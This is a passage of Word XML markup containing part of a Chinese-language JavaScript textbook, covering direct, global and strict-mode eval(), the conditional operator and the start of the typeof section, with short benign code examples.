        <w:t>，它会改变局部变量的值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>函数调用了</w:t>
      </w:r>
      <w:r>
        <w:t>eval("var y=3;")</w:t>
      </w:r>
      <w:r>
        <w:t>，它声明一个新的局部变量</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>。同样地，一个函数可以通过如下代码声明一个局部函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>eval("function f(){return x+1;}");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果在最顶层代码中调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>，当然，它会作用于全局变量和全局函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，传递给</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串必须在语法上讲的通</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>不能通过</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>往函数中任意粘贴代码片段，比如，</w:t>
      </w:r>
      <w:r>
        <w:t>eval("return;")</w:t>
      </w:r>
      <w:r>
        <w:t>是没有意义的，因为</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>只有在函数中才起作用，并且事实上，</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串执行时的上下文环境</w:t>
      </w:r>
      <w:r>
        <w:t>和调用函数的上下文环境是一样的，这不能使其作为函数的一部分来运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>。如果字符串作</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为一个单独的脚本是有语义的（就像诸如</w:t>
      </w:r>
      <w:r>
        <w:t>x=0</w:t>
      </w:r>
      <w:r>
        <w:t>的短代码），那么将其传递给</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>作参数是完全没有问题的，否则，</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>将抛出语法错误异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="4_12_2_Quan_Ju_eval__"/>
      <w:r>
        <w:t>4.12.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>具有更改局部变量的能力，这对于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>优化器来说是一个很大的问题。然而作为一种权宜之计，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器针对那些调用了</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数所做的优化并不多。但当脚本定义了</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的一个别名，且用另一个名称调用它</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器又会如何工作呢？为了让</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器的实现更加简化，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>标准规定了任何解释器都不允许对</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>赋予别名。如果</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数通过别名调用的话，则会抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际上，大多数的实现并不是这么做的。当通过别名调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>会将其字符串当成顶层的全局代码来执行。执行的代码可能会定义新的全局变量和全局函数，或者给全局变量赋值，但却不能使用或修改主调函数中的局部变量，因此，这不会影响到函数内的代码优化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>是反对使用</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>的，并且规范了</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为。</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>直接的</w:t>
      </w:r>
      <w:r>
        <w:t>eval”</w:t>
      </w:r>
      <w:r>
        <w:t>，当直接使用非限定的</w:t>
      </w:r>
      <w:r>
        <w:t>"eval"</w:t>
      </w:r>
      <w:r>
        <w:t>名称（</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>起来像是一个保留字）来调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数时，通常称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:t>eval”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>direct eval</w:t>
      </w:r>
      <w:r>
        <w:t>）。直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>时，它总是在调用它的上下文作用域内执行。其他的间接调用则使用全局对象作为其上下文作用域，并且无法读、写、定义局部变量和函数。下面有一段示例代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var geval=eval;//</w:t>
      </w:r>
      <w:r>
        <w:t>使用别名调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>将是全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>x="global",y="global";//</w:t>
      </w:r>
      <w:r>
        <w:t>两个全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(){//</w:t>
      </w:r>
      <w:r>
        <w:t>函数内执行的是局部</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x="local";//</w:t>
      </w:r>
      <w:r>
        <w:t>定义局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>eval("x+='changed';");//</w:t>
      </w:r>
      <w:r>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>更改了局部变量的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回更改后的局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function g(){//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数内执行了全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y="local";//</w:t>
      </w:r>
      <w:r>
        <w:t>定义局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>geval("y+='changed';");//</w:t>
      </w:r>
      <w:r>
        <w:t>间接调用改变了全局变量的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>y;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回未更改的局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(f(),x);//</w:t>
      </w:r>
      <w:r>
        <w:t>更改了局部变量：输出</w:t>
      </w:r>
      <w:r>
        <w:t>"local changed global":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(g(),y);//</w:t>
      </w:r>
      <w:r>
        <w:t>更改了全局变量：输出</w:t>
      </w:r>
      <w:r>
        <w:t>"local globalchanged":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们注意到，全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>的这些行为不仅仅是出于代码优化器的需要而做出的一种折中方案，它实际上是一种非常有用的特性，它允许我们执行那些对上下文没有任何依赖的全局脚本代码段。我们在本节开始处也提到，真正需要</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>来执行代码段的场景并不多见。但当你真的意识到它的</w:t>
      </w:r>
      <w:r>
        <w:t>必要性时，你更可能会使用全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>而不是局部</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>之前的早期版本</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>和其他浏览器有所不同，当通过别名调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>时并不是全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>（它也不会抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>异常，仅仅将其当做局部</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>来调用）。但</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的确定义了一个名叫</w:t>
      </w:r>
      <w:r>
        <w:t>execScript()</w:t>
      </w:r>
      <w:r>
        <w:t>的全局函数来完成全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>的功能（但和</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>稍有不同，</w:t>
      </w:r>
      <w:r>
        <w:t>execScript()</w:t>
      </w:r>
      <w:r>
        <w:t>总是会返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="4_12_3_Yan_Ge_eval__"/>
      <w:r>
        <w:t>4.12.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　严格</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>严格模式（参照</w:t>
      </w:r>
      <w:r>
        <w:t>5.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）对</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的行为施加了更多的限</w:t>
      </w:r>
      <w:r>
        <w:t>制，甚至对标识符</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>的使用也施加了限制。当在严格模式下调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>时，或者</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>执行的代码段以</w:t>
      </w:r>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>指令开始，这里的</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>是私有上下文环境中的局部</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>。也就是说，在严格模式下，</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>执行的代码段可以查询或更改局部变量，但不能在局部作用域中定义新的变量或函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此外，严格模式将</w:t>
      </w:r>
      <w:r>
        <w:t>"eval"</w:t>
      </w:r>
      <w:r>
        <w:t>列为保留字，这让</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>更像一个运算符。不能用一个别名覆盖</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。并且变量名、函数名、函数参数或者异常捕获的参数都不能取名为</w:t>
      </w:r>
      <w:r>
        <w:t>"eval"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="4_13_Qi_Ta_Yun_Suan_Fu_"/>
      <w:r>
        <w:t>4.13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　其他运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ja</w:t>
      </w:r>
      <w:r>
        <w:t>vaScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持很多其他各种各样的运算符，后续几节详细讨论它们：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="4_13_1_Tiao_Jian_Yun_Suan_Fu_____"/>
      <w:r>
        <w:t>4.13.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　条件运算符</w:t>
      </w:r>
      <w:r>
        <w:t>(?:)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>条件运算符是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中唯一的一个三元运算符（三个操作数），有时直接称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>三元运算符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。通常这个运算符写成</w:t>
      </w:r>
      <w:r>
        <w:t>“?:”</w:t>
      </w:r>
      <w:r>
        <w:t>，当然在代码中往往不会这么简写，因为这个运算符拥有三个操作数，第一个操作数在</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>之前，第二个操作数在</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“:”</w:t>
      </w:r>
      <w:r>
        <w:t>之间，第三个操作数在</w:t>
      </w:r>
      <w:r>
        <w:t>“:”</w:t>
      </w:r>
      <w:r>
        <w:t>之后，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0?x:-x//</w:t>
      </w:r>
      <w:r>
        <w:t>求</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的绝对值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>条件运算符的操作数可以是任意类型。第一个操作数当成布尔值，如果它是真值，那么将计算第二个操</w:t>
      </w:r>
      <w:r>
        <w:t>作数，并返回其计算结果。否则，如果第一个操作数是假值，那么将计算第三个操作数，并返回其计算结果。第二个和第三个操作数总是会计算其中之一，不可能两者同时执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其实使用</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句也会带来同样的效果（参照</w:t>
      </w:r>
      <w:r>
        <w:t>5.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节），</w:t>
      </w:r>
      <w:r>
        <w:t>“?:”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符只是提供了一种简写形式。这里是一个</w:t>
      </w:r>
      <w:r>
        <w:t>“?:”</w:t>
      </w:r>
      <w:r>
        <w:t>的典型应用场</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>景，判断一个变量是否有定义（并拥有一个有意义的真值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>），如果有定义则使用它，如果无定义则使用一个默认值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>greeting="hello"+(username?username:"there");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这和下面使用</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句的代码是等价的，但显然上面的代码更加简洁：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>greeting="hello";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(username)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>greeting+=username;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>greeting+="there";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="4_13_2_typeofYun_Suan_Fu_"/>
      <w:r>
        <w:t>4.13.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>是一元运算符，放在其单个操作数的前面，操作数可以是任意类型。返回值为表示操作数类型的一个字符串。表</w:t>
      </w:r>
      <w:r>
        <w:t>4-3</w:t>
      </w:r>
      <w:r>
        <w:t>列出了任意值在</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算后的返回值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4127739" cy="2074652"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="12" name="00012.jpeg" descr="000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00012.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4127739" cy="2074652"/>
